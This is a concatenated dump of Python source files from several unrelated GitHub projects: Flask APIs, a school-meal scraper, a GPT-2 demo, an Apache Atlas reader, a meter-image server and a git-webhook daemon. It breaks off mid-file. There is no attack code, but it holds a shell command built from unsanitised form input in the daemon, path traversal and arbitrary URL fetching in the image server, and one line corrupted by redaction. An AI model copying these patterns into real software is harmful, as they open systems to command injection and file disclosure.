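For example, 6 is perfect (1+2+3=6), 8 is deficient (1+2+4=7) and 12 is abundant (1+2+3+4+6=16):

```python
for n in (6, 8, 12):
    print(n, is_perfect(n), is_abundant(n), is_deficient(n))
# 6 True False False
# 8 False False True
# 12 False True False
```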
{
"source": "JoMingyu/minitwit-py",
"score": 2
} |
#### File: app/views/follow.py
```python
from flask import Blueprint, Response, abort, g
from flask_restful import Api
from app.models.user import UserModel, FollowModel
from app.views import BaseResource, auth_required
api = Api(Blueprint(__name__, __name__))
api.prefix = '/<username>'
@api.resource('/follow')
class Follow(BaseResource):
@auth_required(UserModel)
def post(self, username):
if g.user.username == username:
abort(400)
users = UserModel.select().where(UserModel.username == username)
if not users:
return Response('', 204)
user = users[0]
if FollowModel.select().where( (FollowModel.follower == g.user) & (FollowModel.followee == user) ):
return Response('', 208)
FollowModel.insert(follower=g.user, followee=user).execute()
return Response('', 201)
@auth_required(UserModel)
def delete(self, username):
if g.user.username == username:
abort(400)
users = UserModel.select().where(UserModel.username == username)
if not users:
return Response('', 204)
user = users[0]
FollowModel.delete().where( (FollowModel.follower == g.user) & (FollowModel.followee == user) ).execute()
return Response('', 200)
``` |
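A hypothetical client exercising the follow endpoint above (the auth mechanics depend on `auth_required`, which is defined elsewhere in the project, so the header here is purely an assumption):

```python
import requests

r = requests.post('http://localhost:5000/jom/follow',
                  headers={'Authorization': 'token-from-login'})  # assumed header
print(r.status_code)  # 201 followed, 208 already following, 400 self-follow
```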
{
"source": "JoMingyu/School-API-Python",
"score": 3
} |
#### File: School-API-Python/schapi/api.py
```python
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
_url = 'http://{0}/sts_sci_md00_001.do?schulCode={1}&schulCrseScCode=4&schulKndScScore=04&schYm={2}{3:0>2}'
SEOUL = 'stu.sen.go.kr'
BUSAN = 'stu.pen.go.kr'
DAEGU = 'stu.dge.go.kr'
INCHEON = 'stu.ice.go.kr'
GWANGJU = 'stu.gen.go.kr'
DAEJEON = 'stu.dje.go.kr'
ULSAN = 'stu.use.go.kr'
SEJONG = 'stu.sje.go.kr'
GYEONGGI = 'stu.cbe.go.kr'
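# NOTE: same host as CHUNGBUK below; Gyeonggi's student NEIS host is likely 'stu.goe.go.kr' (unverified)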
KANGWON = 'stu.kwe.go.kr'
CHUNGBUK = 'stu.cbe.go.kr'
CHUNGNAM = 'stu.cne.go.kr'
JEONBUK = 'stu.jbe.go.kr'
JEONNAM = 'stu.jne.go.kr'
GYEONGBUK = 'stu.gbe.go.kr'
GYEONGNAM = 'stu.gne.go.kr'
JEJU = 'stu.jje.go.kr'
class SchoolAPI:
def __init__(self, region, school_code):
self.region = region
self.school_code = school_code
self.menus = []
self.current_year = 0
self.current_month = 0
        # initial placeholders until the first parse
def get_by_date(self, year, month, day):
"""
Inquire school meals based date
:param year: Year to inquire
:param month: Month to inquire
:param day: Day to inquire
:type year: int
:type month: int
:type day: int
:return: Returns meal dictionary
:rtype: dict
"""
self._validate(year, month)
return self.menus[day]
def get_monthly(self, year, month):
"""
Inquire monthly school meals
:param year: Year to inquire
:param month: Month to inquire
:type year: int
:type month: int
:return: Returns meals list
:rtype: list
"""
self._validate(year, month)
return self.menus
def _validate(self, year, month):
        # validate the cached values before parsing
if not self.menus or (self.current_year != year or self.current_month != month):
self._parse(year, month)
def _parse(self, year, month):
self.menus.clear()
self.menus.append({})
self.current_year = year
self.current_month = month
resp = urlopen(_url.format(self.region, self.school_code, year, month))
soup = BeautifulSoup(resp, 'html.parser')
for data in [td.text for td in soup.find(class_='tbl_type3 tbl_calendar').find_all('td') if td.text != ' ']:
if len(data) > 1 and data != '자료가 없습니다':
                daily_menus = re.findall(r'[가-힇]+\(\w+\)|[가-힇]+', data)
menu_dict = dict()
timing = [menu for menu in daily_menus if re.match('[조중석]식', menu)]
                # keep only the meal timings (breakfast/lunch/dinner) actually present
for i in range(len(timing)):
if i + 1 >= len(timing):
                        # the last timing: slice to the end
menu_dict[timing[i]] = daily_menus[daily_menus.index(timing[i]) + 1:]
else:
menu_dict[timing[i]] = daily_menus[daily_menus.index(timing[i]) + 1: daily_menus.index(timing[i + 1])]
try:
menu_dict['breakfast'] = menu_dict.pop('조식')
except KeyError:
pass
try:
menu_dict['lunch'] = menu_dict.pop('중식')
except KeyError:
pass
try:
menu_dict['dinner'] = menu_dict.pop('석식')
except KeyError:
pass
self.menus.append(menu_dict)
else:
self.menus.append({})
if __name__ == '__main__':
api = SchoolAPI(DAEJEON, 'G100000170')
```
#### File: server/support/xlsx_parser.py
```python
from openpyxl import load_workbook
from db.models.school_data import SchoolModel
WEB_URLS = {
'서울특별시': 'stu.sen.go.kr',
'부산광역시': 'stu.pen.go.kr',
'대구광역시': 'stu.dge.go.kr',
'인천광역시': 'stu.ice.go.kr',
'광주광역시': 'stu.gen.go.kr',
'대전광역시': 'stu.dje.go.kr',
'울산광역시': 'stu.use.go.kr',
'세종특별자치시': 'stu.sje.go.kr',
'경기도': 'stu.cbe.go.kr',
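    # NOTE: same host as '충청북도' below; Gyeonggi is likely 'stu.goe.go.kr' (unverified)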
'강원도': 'stu.kwe.go.kr',
'충청북도': 'stu.cbe.go.kr',
'충청남도': 'stu.cne.go.kr',
'전라북도': 'stu.jbe.go.kr',
'전라남도': 'stu.jne.go.kr',
'경상북도': 'stu.gbe.go.kr',
'경상남도': 'stu.gne.go.kr',
'제주특별자치도': 'stu.jje.go.kr'
}
wb = load_workbook('schoolcodes.xlsx')
sheet = wb['codes']
def parse():
SchoolModel.objects().delete()
    # clear existing records before parsing
    for row in range(2, 3587):
        # number of rows currently in the school-code spreadsheet
        code = sheet['A' + str(row)].value
        # school code
        region = sheet['B' + str(row)].value
        # office of education (region)
        web_url = WEB_URLS[region]
        # NEIS URL
        name = sheet['C' + str(row)].value
        # school name
SchoolModel(code=code, region=region, web_url=web_url, name=name).save()
print('School data Parse Success')
``` |
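Putting the API class to use (the school code comes from the file's own `__main__` block; year and month are illustrative):

```python
api = SchoolAPI(DAEJEON, 'G100000170')
meals = api.get_monthly(2017, 4)    # list of per-day menu dicts (index 0 is padding)
print(api.get_by_date(2017, 4, 3))  # e.g. {'lunch': [...], 'dinner': [...]}
```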
{
"source": "JoMingyu/WakeHeart",
"score": 2
} |
#### File: api/heart/heart_rate.py
```python
from datetime import date, datetime, timedelta
from flask_restful_swagger_2 import Resource, request, swagger
from flask_jwt import current_identity, jwt_required
from db.models.heart_rate import HeartRateModel
from routes.api.heart import heart_rate_doc
def daterange(d1, d2):
return (d1 + timedelta(days=i) for i in range((d2 - d1).days + 1))
class HeartRate(Resource):
@swagger.doc(heart_rate_doc.HEART_RATE_POST)
@jwt_required()
def post(self):
rate = request.form.get('rate', type=int)
HeartRateModel.objects(id_=str(current_identity), date=str(date.today())).delete()
HeartRateModel(id_=str(current_identity), date=str(date.today()), rate=rate).save()
return '', 201
@swagger.doc(heart_rate_doc.HEART_RATE_GET)
@jwt_required()
def get(self):
date_ = request.args.get('date')
heart_rate = HeartRateModel.objects(id_=str(current_identity), date=date_)
if not heart_rate:
return '', 204
else:
return {
'rate': heart_rate.first().rate
}, 200
class DateRangeBasedHeartRate(Resource):
@swagger.doc(heart_rate_doc.DATE_RANGE_BASED_HEART_RATE)
@jwt_required()
def get(self):
start_date = datetime.strptime(request.args.get('start_date'), '%Y-%m-%d').date()
end_date = datetime.strptime(request.args.get('end_date'), '%Y-%m-%d').date()
dates = [str(d) for d in daterange(start_date, end_date)]
heart_rates = list()
for date_ in dates:
print(date_)
heart_rate = HeartRateModel.objects(id_=str(current_identity), date=date_).first()
heart_rates.append({
'date': heart_rate.date if heart_rate else None,
'rate': heart_rate.rate if heart_rate else None
})
if not heart_rates:
return '', 204
else:
return heart_rates, 200
``` |
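Note that `daterange` above includes both endpoints, which is why the handler can iterate from `start_date` through `end_date` directly:

```python
from datetime import date, timedelta

def daterange(d1, d2):
    return (d1 + timedelta(days=i) for i in range((d2 - d1).days + 1))

print([str(d) for d in daterange(date(2018, 1, 1), date(2018, 1, 3))])
# ['2018-01-01', '2018-01-02', '2018-01-03']
```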
{
"source": "jomit/opengpt2",
"score": 2
} |
#### File: opengpt2/flask_demo/flask_predict_api.py
```python
import pickle
from flask import Flask, request
import json
import os
import numpy as np
import tensorflow as tf
from flasgger import Swagger
from time import time
import model, sample, encoder
app = Flask(__name__)
swagger = Swagger(app)
@app.route('/text-generate')
def inference_gpt2(
model_name='',
seed=None,
nsamples=1,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=1,
models_dir='models',
text = None
):
"""Endpoints takes input text to generate text out of it.
---
parameters:
- name: input_text
in: query
type: number
required: true
- name: model_name
in: query
type: string
enum: ['124M', '355M', '774M', '1558M']
required: true
default: all
"""
start = time()
input_text = request.args.get("input_text")
model_name = request.args.get("model_name")
models_dir = os.path.expanduser(os.path.expandvars(models_dir))
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name, models_dir)
hparams = model.default_hparams()
with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, model_name))
saver.restore(sess, ckpt)
raw_text = input_text
context_tokens = enc.encode(raw_text)
generated = 0
for _ in range(nsamples // batch_size):
out = sess.run(output, feed_dict={
context: [context_tokens for _ in range(batch_size)]
})[:, len(context_tokens):]
for i in range(batch_size):
generated += 1
text = enc.decode(out[i])
print("=" * 40 + " SAMPLE " + str(generated) + " " + "=" * 40)
print(text)
print("=" * 80)
output = text
elapsed = time() - start
print('Inference time: {}'.format(elapsed))
return output
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
``` |
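A hypothetical client call against the endpoint above (host and port follow the script's `app.run` call):

```python
import requests

resp = requests.get('http://localhost:5000/text-generate',
                    params={'input_text': 'Once upon a time', 'model_name': '124M'})
print(resp.text)  # the generated continuation
```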
{
"source": "jomit/pyapacheatlas",
"score": 2
} |
#### File: pyapacheatlas/readers/reader.py
```python
from warnings import warn
from collections import OrderedDict
from ..core.util import GuidTracker
from ..core import (
AtlasAttributeDef,
AtlasClassification,
AtlasEntity,
ClassificationTypeDef,
EntityTypeDef
)
from .lineagemixin import LineageMixIn
from . import util as reader_util
class ReaderConfiguration():
"""
A base configuration for the Reader class. Allows you to customize
headers with a source_prefix, target_prefix, and process_prefix for
parsing table and column lineages.
"""
def __init__(self, **kwargs):
super().__init__()
self.value_separator = kwargs.get('value_separator', ';')
self.source_prefix = kwargs.get(
"source_prefix", "Source")
self.target_prefix = kwargs.get(
"target_prefix", "Target")
self.process_prefix = kwargs.get(
"process_prefix", "Process")
self.column_transformation_name = kwargs.get(
"column_transformation_name", "transformation")
class Reader(LineageMixIn):
"""
The base Reader with functionality that supports python dicts.
"""
TEMPLATE_HEADERS = {
"FineGrainColumnLineage": [
"Target table", "Target column", "Target classifications",
"Source table", "Source column", "Source classifications",
"transformation"
],
"TablesLineage": [
"Target table", "Target type", "Target classifications",
"Source table", "Source type", "Source classifications",
"Process name", "Process type"
],
"EntityDefs": [
"Entity TypeName", "name", "description",
"isOptional", "isUnique", "defaultValue",
"typeName", "displayName", "valuesMinCount",
"valuesMaxCount", "cardinality", "includeInNotification",
"indexType", "isIndexable"
],
"ClassificationDefs": [
"classificationName", "entityTypes", "description"
],
"BulkEntities": [
"typeName", "name", "qualifiedName"
],
"UpdateLineage": [
"Target typeName", "Target qualifiedName", "Source typeName",
"Source qualifiedName", "Process name", "Process qualifiedName",
"Process typeName"
],
"ColumnMapping": [
"Source qualifiedName", "Source column", "Target qualifiedName",
"Target column", "Process qualifiedName", "Process typeName",
"Process name"
]
}
def _splitField(self, attrib):
return [e for e in attrib.split(self.config.value_separator) if e]
def __init__(self, configuration, guid=-1000):
"""
Creates the base Reader with functionality that supports python dicts.
:param configuration:
A list of dicts containing at least `Entity TypeName` and `name`
:type configuration:
:class:`~pyapacheatlas.readers.reader.ReaderConfiguration`
:param int guid:
A negative integer to use as the starting counter for entities
created by this reader.
"""
super().__init__()
self.config = configuration
self.guidTracker = GuidTracker(guid)
def _organize_attributes(self, row, existing_entities, ignore=[]):
"""
Organize the row entries into a distinct set of attributes and
relationshipAttributes.
:param dict(str,str) row:
A dict representing the input rows.
:param existing_entities:
A list of existing atlas entities that will be used to infer
any relationship attributes.
:type existing_entities:
dict(str, `:class:~pyapacheatlas.core.entity.AtlasEntity`)
:param list(str) ignore:
A set of keys to ignore and omit from the returned dict.
:return:
A dictionary containing 'attributes' and 'relationshipAttributes'
:rtype: dict(str, dict(str,str))
"""
output = {"attributes": {}, "relationshipAttributes": {}, "root":{}}
for column_name, cell_value in row.items():
# Remove the required attributes so they're not double dipping.
if column_name in ignore:
continue
# Remove any cell with a None / Null attribute
elif cell_value is None:
continue
# If the Attribute key starts with [Relationship]
# Move it to the relation
elif column_name.startswith("[Relationship]"):
cleaned_key = column_name.replace("[Relationship]", "").strip()
if cleaned_key == "meanings":
terms = self._splitField(cell_value)
min_reference = [
{"typeName": "AtlasGlossaryTerm",
"uniqueAttributes": {
"qualifiedName": <EMAIL>(t)
}
} for t in terms
]
else:
# Assuming that we can find this in an existing entity
# TODO: Add support for guid:xxx or typeName/uniqueAttributes.qualifiedName
try:
min_reference = existing_entities[cell_value].to_json(minimum=True)
# LIMITATION: We must have already seen the relationship
# attribute to be certain it can be looked up.
except KeyError:
raise KeyError(
f"The entity {cell_value} should be listed before {row['qualifiedName']}."
)
output["relationshipAttributes"].update(
{cleaned_key: min_reference}
)
# TODO: Add support for Business, Custom
elif column_name.startswith("[root]"):
# This is a root level attribute
cleaned_key = column_name.replace("[root]", "").strip()
output_value = cell_value
if self.config.value_separator in cell_value:
# There's a delimiter in here
output_value = self._splitField(cell_value)
# This seems like a poor place to add business logic like this
if cleaned_key == "classifications":
output_value = [output_value] if not isinstance(output_value, list) else output_value
output_value = [AtlasClassification(c).to_json() for c in output_value]
elif cleaned_key == "labels" and not isinstance(output_value, list):
output_value = [output_value]
output["root"].update( {cleaned_key: output_value} )
else:
output["attributes"].update({column_name: cell_value})
return output
def parse_bulk_entities(self, json_rows):
"""
Create an AtlasEntityWithExtInfo consisting of entities and their attributes
for the given json_rows.
:param list(dict(str,object)) json_rows:
A list of dicts containing at least `typeName`, `name`, and `qualifiedName`
that represents the entity to be uploaded.
:return: An AtlasEntityWithExtInfo with entities for the provided rows.
:rtype: dict(str, list(dict))
"""
        # For each row, extract the required fields and
        # any additional attributes
headers_that_arent_attribs = ["typeName", "name", "qualifiedName", "classifications", "owners", "experts"]
existing_entities = OrderedDict()
# TODO: Remove this once deprecation is removed
classification_column_used = False
for row in json_rows:
if ((row["name"] is None) or (row["typeName"] is None) or
(row["qualifiedName"] is None)):
# An empty row snuck in somehow, skip it.
continue
_extracted = self._organize_attributes(
row,
existing_entities,
headers_that_arent_attribs
)
entity = AtlasEntity(
name=row["name"],
typeName=row["typeName"],
qualified_name=row["qualifiedName"],
guid=self.guidTracker.get_guid(),
attributes=_extracted["attributes"],
relationshipAttributes=_extracted["relationshipAttributes"],
**_extracted["root"]
)
# TODO: Remove at 1.0.0 launch
if "classifications" in row:
classification_column_used = True
entity.classifications = reader_util.string_to_classification(
row["classifications"],
sep=self.config.value_separator)
if "experts" in row or "owners" in row and len( row.get("experts", []) + row.get("owners", []) ) > 0:
experts = []
owners = []
if len(row.get("experts", []) or [])>0:
experts = [{"id":e} for e in row.get("experts", "").split(self.config.value_separator) if e != '']
if len(row.get("owners", []) or [])>0:
owners = [{"id":o} for o in row.get("owners", "").split(self.config.value_separator) if o != '']
entity.contacts = {"Expert": experts, "Owner": owners }
existing_entities.update({row["qualifiedName"]: entity})
output = {"entities": [e.to_json()
for e in list(existing_entities.values())]}
# TODO: Remove this once deprecation is removed
if classification_column_used:
warn("Using `classifications` as a field header is deprecated and will be unsupported in the future."+
" Please use `[root] classifications` instead.")
return output
def parse_entity_defs(self, json_rows):
"""
Create an AtlasTypeDef consisting of entityDefs for the
given json_rows. The columns `Entity TypeName` and `Entity superTypes`
are special and map to typeName and superTypes respectively.
Entity TypeName must be repeated for each row that has a relevant
attribute being defined on it. For example, if you plan on including
five attributes for type X, you would need to have five rows and
each row would have to fill in the Entity TypeName column.
superTypes can be specified all in one cell (default delimiter is `;`
and is controlled by the Reader's configuration) or across multiple
cells. If you specify DataSet in one row for type X and hive_table
for type X in a second row, it will result in a superType
of `[DataSet, hive_table]`.
:param list(dict(str,str)) json_rows:
A list of dicts containing at least `Entity TypeName` and `name`
that represents the metadata for a given entity type's
attributeDefs. Extra metadata will be ignored.
:return: An AtlasTypeDef with entityDefs for the provided rows.
:rtype: dict(str, list(dict))
"""
entities = dict()
entities_to_superTypes = dict()
attribute_metadata_seen = set()
output = {"entityDefs": []}
splitter = lambda attrib: [e for e in attrib.split(self.config.value_separator) if e]
# Required attributes
# Get all the attributes it's expecting official camel casing
# with the exception of "Entity TypeName"
for row in json_rows:
try:
entityTypeName = row["Entity TypeName"]
except KeyError:
raise KeyError("Entity TypeName not found in {}".format(row))
_ = row.pop("Entity TypeName")
# If the user wants to add super types, they might be adding
# multiple on each row. They DON'T NEED TO but they might
entitySuperTypes = []
if "Entity superTypes" in row:
superTypes_string = row.pop("Entity superTypes")
# Might return a None or empty string
if superTypes_string:
entitySuperTypes = splitter(superTypes_string)
# Need to add this entity to the superTypes mapping if it doesn't
# already exist
if entityTypeName in entities_to_superTypes:
entities_to_superTypes[entityTypeName].extend(entitySuperTypes)
else:
entities_to_superTypes[entityTypeName] = entitySuperTypes
# Update all seen attribute metadata
columns_in_row = list(row.keys())
attribute_metadata_seen = attribute_metadata_seen.union(
set(columns_in_row))
# Remove any null cells, otherwise the AttributeDefs constructor
# doesn't use the defaults.
for column in columns_in_row:
if row[column] is None:
_ = row.pop(column)
json_attribute_def = AtlasAttributeDef(**row).to_json()
if entityTypeName not in entities:
entities[entityTypeName] = []
entities[entityTypeName].append( json_attribute_def )
# Create the entitydefs
for entityType in entities:
# Handle super types by de-duping, removing Nones / empty str and
# defaulting to ["DataSet"] if no user input super Types
all_super_types = [t for t in set(entities_to_superTypes[entityType]) if t]
if len(all_super_types) == 0:
all_super_types = ["DataSet"]
local_entity_def = EntityTypeDef(
name=entityType,
attributeDefs=entities[entityType],
# Adding this as a default until I figure
# do this from the excel / json readers.
superTypes=all_super_types
).to_json()
output["entityDefs"].append(local_entity_def)
# Extra attribute metadata (e.g. extra columns / json entries)
# are ignored. Warn the user that this metadata will be ignored.
extra_metadata_warnings = [
i for i in attribute_metadata_seen if i not in AtlasAttributeDef.propertiesEnum]
for extra_metadata in extra_metadata_warnings:
warn(("The attribute metadata \"{}\" is not a part of the Atlas" +
" Attribute Def and will be ignored.").format(
extra_metadata))
return output
def parse_classification_defs(self, json_rows):
"""
Create an AtlasTypeDef consisting of classificationDefs for the
given json_rows.
:param list(dict(str,str)) json_rows:
A list of dicts containing at least `classificationName`.
:return: An AtlasTypeDef with classificationDefs for the provided rows.
:rtype: dict(str, list(dict))
"""
defs = []
for row in json_rows:
try:
classificationTypeName = row["classificationName"]
except KeyError:
raise KeyError("classificationName not found in {}".format(row))
_ = row.pop("classificationName")
# Update all seen attribute metadata
columns_in_row = list(row.keys())
# Remove any null cells, otherwise the TypeDef constructor
# doesn't use the defaults.
for column in columns_in_row:
if row[column] is None:
_ = row.pop(column)
splitter = lambda attrib: [e for e in attrib.split(self.config.value_separator) if e]
if "entityTypes" in row:
row["entityTypes"] = splitter(row["entityTypes"])
if "superTypes" in row:
row["superTypes"] = splitter(row["superTypes"])
if "subTypes" in row:
row["subTypes"] = splitter(row["subTypes"])
json_classification_def = ClassificationTypeDef(classificationTypeName, **row).to_json()
defs.append(json_classification_def)
return {"classificationDefs": defs}
@staticmethod
def make_template():
"""
Generate a template for the given reader.
"""
raise NotImplementedError
``` |
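A minimal sketch of feeding `parse_bulk_entities` by hand (the row values are made up; only `typeName`, `name` and `qualifiedName` are required, anything else becomes an attribute):

```python
reader = Reader(ReaderConfiguration())
rows = [{'typeName': 'DataSet', 'name': 'demo_table',
         'qualifiedName': 'demo_table@example', 'description': 'a toy row'}]
batch = reader.parse_bulk_entities(rows)
print(len(batch['entities']))  # 1 entity, with 'description' under its attributes
```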
{
"source": "jomjol/water-meter-image-cut",
"score": 3
} |
#### File: water-meter-image-cut/code/water-meter-image-cut.py
```python
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib import parse
import urllib.request
import socketserver
import lib.CutImageClass
import cv2
CutImage = lib.CutImageClass.CutImage()
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
global CutImage
if "/image_tmp/" in self.path:
self.send_response(200)
            self.send_header('Content-type', 'image/jpeg')
            self.end_headers()
            with open('.'+self.path, 'rb') as file:
                self.wfile.write(file.read()) # Read the file and send the contents
if "url=" in self.path:
url = parse.parse_qs(parse.urlparse(self.path).query)['url'][0]
urllib.request.urlretrieve(url, './image_tmp/original.jpg')
result = CutImage.Cut('./image_tmp/original.jpg')
txt = 'Original: <p><img src=/image_tmp/original.jpg></img><p>'
txt = txt + 'Rotate: <p><img src=/image_tmp/rot.jpg></img><p>'
txt = txt + '<p>Aligned Image: <p><img src=/image_tmp/alg.jpg></img><p>'
txt = txt + 'Digital Counter: <p>'
for i in range(len(result[1])):
txt = txt + '<img src=/image_tmp/'+ str(result[1][i][0]) + '.jpg></img>'
txt = txt + '<p>'
txt = txt + 'Analog Meter: <p>'
for i in range(len(result[0])):
txt += '<img src=/image_tmp/'+ str(result[0][i][0]) + '.jpg></img>'
txt = txt + '<p>'
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(bytes(txt, 'UTF-8'))
PORT = 3000
with socketserver.TCPServer(("", PORT), SimpleHTTPRequestHandler) as httpd:
print("serving at port", PORT)
httpd.serve_forever()
``` |
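A hypothetical request against the handler above (port 3000 as in the script; the meter-image URL is a placeholder):

```python
import urllib.request

html = urllib.request.urlopen(
    'http://localhost:3000/?url=http://example.com/meter.jpg').read()
# returns an HTML page embedding the rotated, aligned and cut-out digit images
```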
{
"source": "JoM-Lab/JoM",
"score": 2
} |
#### File: JoM/jom/daemon.py
```python
from gevent import monkey
monkey.patch_all()
import sys
import time
import shlex
import bottle
import subprocess
UPDATE_CMD = 'python -m jom.update'
POLLING_CMD = 'python -m jom.polling'
DOCS_CMD = 'cd docs; make html'
# cmd to get the current branch
BRANCH_CMD = 'git branch | grep "*" | cut -d " " -f 2'
# cmd to get the newest commit log
HEAD_CMD = 'git log -n 1 --oneline'
update_proc = None
update_err_msg = ''
polling_proc = None
polling_err_msg = ''
def restart_procs():
'''
restart update and polloing processes.
'''
global update_proc, update_err_msg, polling_proc, polling_err_msg
if update_proc and update_proc.poll() is None:
# if running, kill it first
sys.stderr.write('kill update proc {}\n'.format(update_proc.pid))
update_proc.terminate()
update_proc = subprocess.Popen(shlex.split(UPDATE_CMD),
stdout=open('update.log', 'a', 1),
stderr=subprocess.PIPE)
sys.stderr.write('start update proc {}\n'.format(update_proc.pid))
# reset the error messages
update_err_msg = ''
if polling_proc and polling_proc.poll() is None:
# if running, kill it first
sys.stderr.write('kill polling proc {}\n'.format(polling_proc.pid))
polling_proc.terminate()
polling_proc = subprocess.Popen(shlex.split(POLLING_CMD),
stdout=open('polling.log', 'a', 1),
stderr=subprocess.PIPE)
sys.stderr.write('start polling proc {}\n'.format(polling_proc.pid))
# reset the error messages
polling_err_msg = ''
time.sleep(1)
# check if dead immediately and get error messages
check_status()
def check_status():
'''
    Check the status of both child processes and pull out their error messages.
'''
global update_err_msg, polling_err_msg
if not update_proc:
update_status = 'not started'
elif update_proc.poll() is None:
update_status = 'running({})'.format(update_proc.pid)
else: # dead
update_status = 'exited({})'.format(update_proc.returncode)
if update_err_msg == '': # haven't pull out
update_err_msg = update_proc.stderr.read().decode('utf-8')
if not polling_proc:
polling_status = 'not started'
elif polling_proc.poll() is None:
polling_status = 'running({})'.format(polling_proc.pid)
else: # dead
polling_status = 'exited({})'.format(polling_proc.returncode)
if polling_err_msg == '': # haven't pull out
polling_err_msg = polling_proc.stderr.read().decode('utf-8')
# regenerate docs
subprocess.getstatusoutput(DOCS_CMD)
return update_status, polling_status
@bottle.post('/checkout')
def checkout():
'''
Change current branch.
'''
branch = bottle.request.forms.get('branch')
(st, output) = subprocess.getstatusoutput('git checkout ' + branch)
if st != 0:
return 'error {} in pull: {}'.format(st, output)
restart_procs()
return '{} {}'.format(*check_status())
@bottle.get('/hook')
@bottle.post('/hook')
def hook():
'''
Pull commits from remote server and restart processes.
'''
# data = bottle.request.json
(st, output) = subprocess.getstatusoutput('git pull')
if st != 0:
return 'error {} in pull: {}'.format(st, output)
restart_procs()
return '{} {}'.format(*check_status())
@bottle.route('/docs/<p:re:.*>')
@bottle.auth_basic(lambda username, password:
username == 'jom' and password == '<PASSWORD>')
def serve_docs(p=''):
if not p:
p = 'index.html'
return bottle.static_file(p, root='docs/_build/html')
@bottle.route('/')
@bottle.auth_basic(lambda username, password:
username == 'jom' and password == '<PASSWORD>')
def main():
'''
Display HTML.
'''
(st, branch) = subprocess.getstatusoutput(BRANCH_CMD)
(st, head) = subprocess.getstatusoutput(HEAD_CMD)
update_status, polling_status = check_status()
return '''\
<html><body>
<form action="/checkout" method="post">
current branch: {branch}
<input name="branch" type="text"/>
<input value="checkout" type="submit"/></form><br/>
current HEAD: {head}
<a href="/hook"><button type="button">pull and restart</button></a><br/><br/>
update proc: {update_status}<br/>
<pre>{update_err_msg}</pre><br/>
polling proc: {polling_status}<br/>
<pre>{polling_err_msg}</pre><br/>
<a href="/docs/">docs</a>
</body></html>
'''.format(branch=branch,
head=head,
update_status=update_status,
update_err_msg=update_err_msg,
polling_status=polling_status,
polling_err_msg=polling_err_msg)
if __name__ == '__main__':
restart_procs()
bottle.run(host='', port=8888, debug=True, server='gevent')
```
#### File: JoM/jom/db.py
```python
import re
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine, Column, Integer, BigInteger, Text, Boolean, func
from sqlalchemy.dialects.postgresql import TIMESTAMP, JSONB
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Tweet(Base):
""" Representation of Tweet instance in database. """
__tablename__ = 'tweets'
#: tweet numeric id (primary key)
id = Column(BigInteger, primary_key=True)
#: sender's user_id
user_id = Column(BigInteger)
#: type of tweet: tweet, reply, rt, quote
type = Column(Text)
#: timestamp when tweet
timestamp = Column(BigInteger)
#: json data
tweet = Column(Text)
#: main content of tweet
text = Column(Text)
#: whether is already deleted online
deleted = Column(Boolean)
class Quote(Base):
""" Representation of Quote instance in database. """
__tablename__ = 'quote'
#: tweet numeric id (primary key)
id = Column(Integer, primary_key=True)
#: timestamp of the quote
timestamp = Column(BigInteger)
#: user id of the person who made the quote
user_id = Column(BigInteger)
#: main content
text = Column(Text)
class Follow(Base):
""" Representation of following/follower change instance in database. """
__tablename__ = 'follow'
#: unique id
id = Column(Integer, primary_key=True)
#: timestamp when action happens
timestamp = Column(BigInteger)
#: user id of the actor
user_id = Column(BigInteger)
#: numeric id of target
target_id = Column(BigInteger)
#: screen_name of target
target_name = Column(Text)
#: type of action: unfo, fo, unfoed, foed
action = Column(Text)
class Bio(Base):
""" Representation of bio change instance in database. """
__tablename__ = 'bio'
#: unique id
id = Column(Integer, primary_key=True)
#: timestamp when bio changes
timestamp = Column(TIMESTAMP)
#: bio json data
bio = Column(JSONB)
def re_fn(pat, item):
"""Customized search function.
:param str pat: pattern
:param str item: target
:return: if item matches pattern
:rtype: bool
"""
try:
reg = re.compile(pat, re.I) # perform case-insensitive matching
return reg.search(item) is not None
except re.error:
return False
def new_session(debug=False):
"""Create new database session.
HOWTO init PostgreSQL database::
sudo -i -u postgres
initdb --locale en_US.UTF-8 -E UTF8 -D '/var/lib/postgres/data'
sudo systemctl start postgresql.service
createuser -s -e -d jom
createdb jom -U jom
:return: a database session
:rtype: DBSession
"""
engine = create_engine('postgresql://jom:@localhost/jom', echo=debug)
Base.metadata.create_all(engine)
DBSession = sessionmaker(engine)
session = DBSession()
return session
def check_deleted(session, tweets):
"""Check if there are tweets in DB are deleted online based on
these existing tweets.
:type tweets: Dict
:param tweets: list of tweets of someone sorted by id descendingly
"""
user_id = tweets[-1]['user']['id']
since_id = tweets[-1]['id']
tweets_in_db = session.query(Tweet)\
.filter((Tweet.user_id == user_id) &
(Tweet.id >= since_id))\
.order_by(Tweet.id.desc()).all()
dels = []
tweets = tweets[:] # make a copy
# check backwards
while tweets and tweets_in_db:
if tweets_in_db[-1].id < tweets[-1]['id']:
dels.append(tweets_in_db.pop())
elif tweets_in_db[-1].id > tweets[-1]['id']:
tweets.pop()
elif tweets_in_db[-1].id == tweets[-1]['id']:
tweets_in_db.pop()
tweets.pop()
# dels.extend(tweets_in_db)
for t in dels:
t.deleted = True
session.add(t)
session.commit()
return dels
if __name__ == '__main__':
import json
victims = json.load(open('config.json'))['victims']
name2id = {u['ref_screen_name']: _id for _id, u in victims.items()}
session = new_session(debug=True)
for i in session.query(Tweet.text)\
.filter((Tweet.user_id == name2id['masked']) &
(Tweet.type == 'tweet'))\
.filter(Tweet.text.op('~')('23*3'))\
.order_by(func.random()).limit(5):
print(i.text)
```
#### File: JoM/jom/resp.py
```python
class Resp:
